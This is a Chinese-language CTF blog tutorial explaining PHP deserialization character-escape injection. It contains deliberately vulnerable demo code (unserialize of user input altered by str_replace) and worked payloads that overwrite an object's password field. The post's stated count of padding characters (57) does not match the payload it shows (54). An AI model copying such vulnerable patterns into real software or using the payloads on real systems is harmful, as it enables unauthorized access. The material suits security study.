<!doctype html>
<html lang="en-us">
  <head>
    <title>反序列化字符逃逸 // main1o</title>
    <link rel="shortcut icon" href="pochita.png" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.114.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="John Doe" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.5b1fcc8902588589c4767187402a3c29f8b8d7a6fdef6d9f8f77045bb0d14fee.css" />
    

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="反序列化字符逃逸"/>
<meta name="twitter:description" content="Php反序列化字符逃逸 个人理解的字符逃逸
字符增加 demo_1: &lt;?php error_reporting(0); highlight_file(__FILE__); class ik{ public $username = &#39;m&#39;; public $password = &#39;ikun&#39;; public function __construct($username){ $this-&gt;username = $username; } public function __wakeup(){ if($this-&gt;password === &#39;ik&#39;){ include(&#39;flag.php&#39;); echo PHP_EOL . $flag; # flag.php -&gt; flag{this_flag} }else{ echo &#34;哎呦 你干嘛~&#34;; } } } function filter($obj){ return str_replace(&#39;l&#39;,&#39;ll&#39;,$obj); } $username = $_GET[&#39;a&#39;]; $obj = serialize(new ik($username)); $ter = filter($obj); unserialize($ter); __wakeup()魔术方法会在反序列化时，判断属性password是否是ik然后在引入flag。但是类中唯一的传值点就在**$username**
filter()方法对类ik的对象进行替换会多出一个字符，反序列化是从左往右读的,只读键的长度,多出了字符就忽略，那么这个就叫字符逃逸。可以对**$username进行逃逸，从而覆盖到$password**
O:4:&#34;demo&#34;:1:{s:4:&#34;name&#34;;s:2:&#34;iki&#34;;} # 2:&#34;iki&#34; 这里键的长度为3，只读键的长度多了一个i。从左往右读，那么这个&#39;}&#39;就是逃逸(忽略)了的 比如:
&lt;?php class ik{ public $username = &#39;m&#39;; public $password = &#39;ik&#39;; } print_r(serialize(new ik())); # O:2:&#34;ik&#34;:2:{s:8:&#34;username&#34;;s:1:&#34;m&#34;;s:8:&#34;password&#34;;s:2:&#34;ik&#34;;} 这&quot;;s:8:&quot;password&quot;;s:2:&quot;ik&quot;;}就是要逃逸的字符数量27。php通过;}来判断反序列化的结束标志。因为之前的filter()将1个l替换为2个l，多了一个l。所以要逃逸我们的payload需要27个l然后拼接"/>

    <meta property="og:title" content="反序列化字符逃逸" />
<meta property="og:description" content="Php反序列化字符逃逸 个人理解的字符逃逸
字符增加 demo_1: &lt;?php error_reporting(0); highlight_file(__FILE__); class ik{ public $username = &#39;m&#39;; public $password = &#39;ikun&#39;; public function __construct($username){ $this-&gt;username = $username; } public function __wakeup(){ if($this-&gt;password === &#39;ik&#39;){ include(&#39;flag.php&#39;); echo PHP_EOL . $flag; # flag.php -&gt; flag{this_flag} }else{ echo &#34;哎呦 你干嘛~&#34;; } } } function filter($obj){ return str_replace(&#39;l&#39;,&#39;ll&#39;,$obj); } $username = $_GET[&#39;a&#39;]; $obj = serialize(new ik($username)); $ter = filter($obj); unserialize($ter); __wakeup()魔术方法会在反序列化时，判断属性password是否是ik然后在引入flag。但是类中唯一的传值点就在**$username**
filter()方法对类ik的对象进行替换会多出一个字符，反序列化是从左往右读的,只读键的长度,多出了字符就忽略，那么这个就叫字符逃逸。可以对**$username进行逃逸，从而覆盖到$password**
O:4:&#34;demo&#34;:1:{s:4:&#34;name&#34;;s:2:&#34;iki&#34;;} # 2:&#34;iki&#34; 这里键的长度为3，只读键的长度多了一个i。从左往右读，那么这个&#39;}&#39;就是逃逸(忽略)了的 比如:
&lt;?php class ik{ public $username = &#39;m&#39;; public $password = &#39;ik&#39;; } print_r(serialize(new ik())); # O:2:&#34;ik&#34;:2:{s:8:&#34;username&#34;;s:1:&#34;m&#34;;s:8:&#34;password&#34;;s:2:&#34;ik&#34;;} 这&quot;;s:8:&quot;password&quot;;s:2:&quot;ik&quot;;}就是要逃逸的字符数量27。php通过;}来判断反序列化的结束标志。因为之前的filter()将1个l替换为2个l，多了一个l。所以要逃逸我们的payload需要27个l然后拼接" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://main1o.github.io/post/php%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2022-08-24T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-08-24T00:00:00+00:00" />


  </head>
  <body>
    <header class="app-header">
      <a href="https://main1o.github.io/"><img class="app-header-avatar" src="/avatar.png" alt="John Doe" /></a>
      <span class="app-header-title">main1o</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
            -
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
            -
          
          <a class="app-header-menu-item" href="/links/">Links</a>
            -
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>荆棘之路</p>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">反序列化字符逃逸</h1>
      <div class="post-meta">
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Aug 24, 2022
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          2 min read
        </div>
        <div>
          <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://main1o.github.io/tags/php/">php</a>
              <a class="tag" href="https://main1o.github.io/tags/ctf/">ctf</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <h2 id="php反序列化字符逃逸">Php反序列化字符逃逸</h2>
<blockquote>
<p>个人理解的字符逃逸</p>
</blockquote>
<h3 id="字符增加">字符增加</h3>
<h4 id="demo_1">demo_1:</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">error_reporting</span>(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">highlight_file</span>(<span style="color:#66d9ef">__FILE__</span>);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ik</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;m&#39;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;ikun&#39;</span>;
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">function</span> __construct($username){
</span></span><span style="display:flex;"><span>        $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">username</span> <span style="color:#f92672">=</span> $username;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">function</span> __wakeup(){
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span>($this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">password</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ik&#39;</span>){
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">include</span>(<span style="color:#e6db74">&#39;flag.php&#39;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">echo</span> <span style="color:#a6e22e">PHP_EOL</span> <span style="color:#f92672">.</span> $flag;
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># flag.php -&gt; flag{this_flag}
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        }<span style="color:#66d9ef">else</span>{
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;哎呦 你干嘛~&#34;</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">filter</span>($obj){
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">str_replace</span>(<span style="color:#e6db74">&#39;l&#39;</span>,<span style="color:#e6db74">&#39;ll&#39;</span>,$obj);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$username <span style="color:#f92672">=</span> $_GET[<span style="color:#e6db74">&#39;a&#39;</span>];
</span></span><span style="display:flex;"><span>$obj <span style="color:#f92672">=</span> <span style="color:#a6e22e">serialize</span>(<span style="color:#66d9ef">new</span> <span style="color:#a6e22e">ik</span>($username));
</span></span><span style="display:flex;"><span>$ter <span style="color:#f92672">=</span> <span style="color:#a6e22e">filter</span>($obj);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">unserialize</span>($ter);
</span></span></code></pre></div><ol>
<li>
<p>__wakeup()魔术方法会在反序列化时，判断属性<strong>password</strong>是否是<strong>ik</strong>然后在引入flag。但是类中唯一的传值点就在**$username**</p>
</li>
<li>
<p><strong>filter()<strong>方法对类</strong>ik</strong>的对象进行替换会多出一个字符，反序列化是从左往右读的,只读键的长度,多出了字符就忽略，那么这个就叫字符逃逸。可以对**$username<strong>进行逃逸，从而覆盖到</strong>$password**</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#a6e22e">O</span><span style="color:#f92672">:</span><span style="color:#ae81ff">4</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#34;demo&#34;</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1</span><span style="color:#f92672">:</span>{<span style="color:#a6e22e">s</span><span style="color:#f92672">:</span><span style="color:#ae81ff">4</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#34;name&#34;</span>;<span style="color:#a6e22e">s</span><span style="color:#f92672">:</span><span style="color:#ae81ff">2</span><span style="color:#f92672">:</span><span style="color:#e6db74">&#34;iki&#34;</span>;}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># 2:&#34;iki&#34; 这里键的长度为3，只读键的长度多了一个i。从左往右读，那么这个&#39;}&#39;就是逃逸(忽略)了的 
</span></span></span></code></pre></div></li>
</ol>
<p>比如:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ik</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;m&#39;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;ik&#39;</span>;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">print_r</span>(<span style="color:#a6e22e">serialize</span>(<span style="color:#66d9ef">new</span> <span style="color:#a6e22e">ik</span>()));
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># O:2:&#34;ik&#34;:2:{s:8:&#34;username&#34;;s:1:&#34;m&#34;;s:8:&#34;password&#34;;s:2:&#34;ik&#34;;}
</span></span></span></code></pre></div><p>这<code>&quot;;s:8:&quot;password&quot;;s:2:&quot;ik&quot;;}</code>就是要逃逸的字符数量27。php通过<code>;}</code>来判断反序列化的结束标志。因为之前的<strong>filter()<strong>将1个</strong>l</strong>替换为2个<strong>l</strong>，多了一个<strong>l</strong>。所以要逃逸我们的payload需要27个<strong>l</strong>然后拼接</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#a6e22e">lllllllllllllllllllllllllll</span><span style="color:#e6db74">&#34;;s:8:&#34;</span><span style="color:#a6e22e">password</span><span style="color:#e6db74">&#34;;s:2:&#34;</span><span style="color:#a6e22e">ik</span><span style="color:#e6db74">&#34;;}
</span></span></span></code></pre></div><p><img src="20220822232508.png" alt="20220822232508"></p>
<h4 id="demo_2">demo_2:</h4>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">error_reporting</span>(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">highlight_file</span>(<span style="color:#66d9ef">__FILE__</span>);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ik</span>{
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;m&#39;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> $password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;ik&#39;</span>;
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">function</span> __construct($username){
</span></span><span style="display:flex;"><span>        $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">username</span> <span style="color:#f92672">=</span> $username;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">public</span> <span style="color:#66d9ef">function</span> __wakeup(){
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span>($this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">password</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;ikun&#39;</span>){
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">include</span>(<span style="color:#e6db74">&#39;flag.php&#39;</span>);
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">echo</span> <span style="color:#a6e22e">PHP_EOL</span> <span style="color:#f92672">.</span> $flag;
</span></span><span style="display:flex;"><span>            <span style="color:#75715e"># flag.php -&gt; flag{this_flag}
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        }<span style="color:#66d9ef">else</span>{
</span></span><span style="display:flex;"><span>            <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;哎呦 你干嘛~&#34;</span>;
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">filter</span>($obj){
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">str_replace</span>(<span style="color:#e6db74">&#39;main1o&#39;</span>,<span style="color:#e6db74">&#39;main1oikun&#39;</span>,$obj);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$username <span style="color:#f92672">=</span> $_GET[<span style="color:#e6db74">&#39;a&#39;</span>];
</span></span><span style="display:flex;"><span>$obj <span style="color:#f92672">=</span> <span style="color:#a6e22e">serialize</span>(<span style="color:#66d9ef">new</span> <span style="color:#a6e22e">ik</span>($username));
</span></span><span style="display:flex;"><span>$ter <span style="color:#f92672">=</span> <span style="color:#a6e22e">filter</span>($obj);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">unserialize</span>($ter);
</span></span></code></pre></div><ol>
<li>
<p>和demo_1类似的，不过<strong>filter</strong>每次替换多4个字符，payload：</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> 
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">class</span> <span style="color:#a6e22e">ik</span>{
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">public</span> $username <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;m&#39;</span>;
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">public</span> $password <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;ikun&#39;</span>;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">print_r</span>(<span style="color:#a6e22e">serialize</span>(<span style="color:#66d9ef">new</span> <span style="color:#a6e22e">ik</span>()))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># O:2:&#34;ik&#34;:2:{s:8:&#34;username&#34;;s:1:&#34;m&#34;;s:8:&#34;password&#34;;s:4:&#34;ikun&#34;;}
</span></span></span></code></pre></div></li>
<li>
<p><code>&quot;;s:8:&quot;password&quot;;s:4:&quot;ikun&quot;;}</code>是需要逃逸的字符一共<strong>29</strong>。但是，使用7个<strong>main1o</strong>，则会少一个字符，使用8个<strong>main1o</strong>  则会多3个。我们选择8个<strong>main1o</strong> ，只需要在需要逃逸的字符，后面在添加3个任意字符代替即可。</p>
</li>
</ol>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#a6e22e">main1omain1omain1omain1omain1omain1omain1omain1o</span><span style="color:#e6db74">&#34;;s:8:&#34;</span><span style="color:#a6e22e">password</span><span style="color:#e6db74">&#34;;s:4:&#34;</span><span style="color:#a6e22e">ikun</span><span style="color:#e6db74">&#34;;}aaa
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"># 添加3个a
</span></span></span></code></pre></div><p><img src="image-20220823143643876.png" alt="image-20220823143643876"></p>
<h3 id="字符减少">字符减少</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> 
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">error_reporting</span>(<span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">highlight_file</span>(<span style="color:#66d9ef">__FILE__</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$arr[<span style="color:#e6db74">&#39;user&#39;</span>] <span style="color:#f92672">=</span> $_GET[<span style="color:#e6db74">&#39;user&#39;</span>];
</span></span><span style="display:flex;"><span>$arr[<span style="color:#e6db74">&#39;pass&#39;</span>] <span style="color:#f92672">=</span> $_GET[<span style="color:#e6db74">&#39;pass&#39;</span>];
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> <span style="color:#a6e22e">filter</span>($str){
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">str_replace</span>(<span style="color:#e6db74">&#39;aa&#39;</span>,<span style="color:#e6db74">&#39;a&#39;</span>,$str);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>$q <span style="color:#f92672">=</span> <span style="color:#a6e22e">serialize</span>($arr);
</span></span><span style="display:flex;"><span>$w <span style="color:#f92672">=</span> <span style="color:#a6e22e">filter</span>($q);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;过滤前:&#39;</span><span style="color:#f92672">.</span> $q <span style="color:#f92672">.</span> <span style="color:#e6db74">&#39;&lt;/br&gt;&#39;</span>;
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;过滤后:&#39;</span><span style="color:#f92672">.</span> $w <span style="color:#f92672">.</span> <span style="color:#e6db74">&#39;&lt;/br&gt;&#39;</span>;
</span></span><span style="display:flex;"><span>$e <span style="color:#f92672">=</span> <span style="color:#a6e22e">unserialize</span>($w);
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#39;pass = &#39;</span> <span style="color:#f92672">.</span> $e[<span style="color:#e6db74">&#39;pass&#39;</span>];
</span></span></code></pre></div><p>正常传参</p>
<p><img src="image-20220824220512485.png" alt="image-20220824220512485"></p>
<p>加入<code>aa</code>后被过滤了的，导致少了一个字符。所以向后面吃掉一个字符，导致反序列化失败</p>
<p><img src="image-20220824220719545.png" alt="image-20220824220719545"></p>
<p>反之，只需要计算出它需要吃掉的字符，在添加字符填补，即可反序列化成功。</p>
<p>我们的payload一共27个字符   <code>&quot;;s:4:&quot;pass&quot;;s:6:&quot;123456&quot;;}</code>   知道2个aa会变一个a，所以<code>a</code>需要57个(payload * 2)</p>
<p><code>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&amp;pass=&quot;;s:4:&quot;pass&quot;;s:6:&quot;123456&quot;;}</code></p>
<p><img src="image-20220824223358411.png" alt="image-20220824223358411"></p>
<p>紫色的<code>pass</code>为键，27个字符为我们的payload前面有<code>&quot;</code>形成闭合。紫色部分为<strong>19</strong>个字符，所以填充字符为8个
（54减去红色的27个a减去紫色部分19）</p>
<p>任意填充8个即可：</p>
<p><img src="image-20220824224841648.png" alt="image-20220824224841648"></p>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
